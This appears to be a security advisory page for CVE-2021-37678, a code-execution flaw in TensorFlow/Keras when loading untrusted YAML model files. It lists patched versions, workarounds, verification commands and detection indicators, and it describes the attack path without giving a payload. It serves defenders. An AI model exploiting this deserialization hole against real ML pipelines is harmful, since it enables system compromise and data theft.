CVE-2021-37678
📋 TL;DR
This vulnerability allows arbitrary code execution when TensorFlow or Keras deserializes a malicious YAML model file. Attackers can exploit unsafe YAML loading to run arbitrary commands on affected systems. Users of TensorFlow who load Keras models from YAML format are affected.
💻 Affected Systems
- TensorFlow
- Keras
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining remote code execution, potentially leading to data theft, ransomware deployment, or lateral movement within the network.
Likely Case
Local privilege escalation or remote code execution in ML pipelines that process untrusted YAML model files, compromising the hosting server.
If Mitigated
Limited impact if systems only load trusted YAML files from secure sources and have proper network segmentation.
🎯 Exploit Status
Exploitation requires the victim to load a malicious YAML file. Public proof-of-concept demonstrates code execution via crafted YAML payloads.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: TensorFlow 2.6.0, 2.5.1, 2.4.3, 2.3.4
Vendor Advisory: https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r
Restart Required: No
Instructions:
1. Upgrade TensorFlow to patched version: pip install --upgrade tensorflow==2.6.0 (or appropriate version). 2. Verify YAML model loading is disabled or removed in your codebase. 3. Test ML pipelines after upgrade.
🔧 Temporary Workarounds
Disable YAML model loading
allRemove or disable all usage of keras.models.model_from_yaml() and related YAML deserialization functions in your code.
# Search for YAML model loading in Python code
grep -r "model_from_yaml\|yaml\.load" /path/to/code/
# Replace with safe alternatives like model_from_json()
Use safe YAML loader
allIf YAML loading is required, replace yaml.unsafe_load with yaml.safe_load in custom code (note: TensorFlow's implementation cannot be safely patched this way).
# In custom Python code:
import yaml
# Replace: data = yaml.unsafe_load(file)
# With: data = yaml.safe_load(file)
🧯 If You Can't Patch
- Restrict YAML file uploads to trusted sources only
- Implement strict input validation and sandboxing for ML model processing pipelines
🔍 How to Verify
Check if Vulnerable:
Check TensorFlow version and usage of YAML model loading: python -c "import tensorflow as tf; print(tf.__version__)" and review code for model_from_yaml() calls.Check Version:
python -c "import tensorflow as tf; print('TensorFlow version:', tf.__version__)"Verify Fix Applied:
After patching, verify TensorFlow version >=2.6.0, 2.5.1, 2.4.3, or 2.3.4, and test that YAML model loading fails or is disabled.📡 Detection & Monitoring
Log Indicators:
- Unusual process execution from TensorFlow/Python processes
- Errors related to YAML parsing or model loading failures
- Large or malformed YAML file uploads to ML endpoints
Network Indicators:
- Unexpected outbound connections from ML servers after YAML file processing
- HTTP requests with YAML payloads to model loading endpoints
SIEM Query:
source="*tensorflow*" AND ("yaml" OR "model_from_yaml") AND (process_execution OR error)🔗 References
- https://github.com/tensorflow/tensorflow/commit/23d6383eb6c14084a8fc3bdf164043b974818012
- https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r
- https://github.com/tensorflow/tensorflow/commit/23d6383eb6c14084a8fc3bdf164043b974818012
- https://github.com/tensorflow/tensorflow/security/advisories/GHSA-r6jx-9g48-2r5r
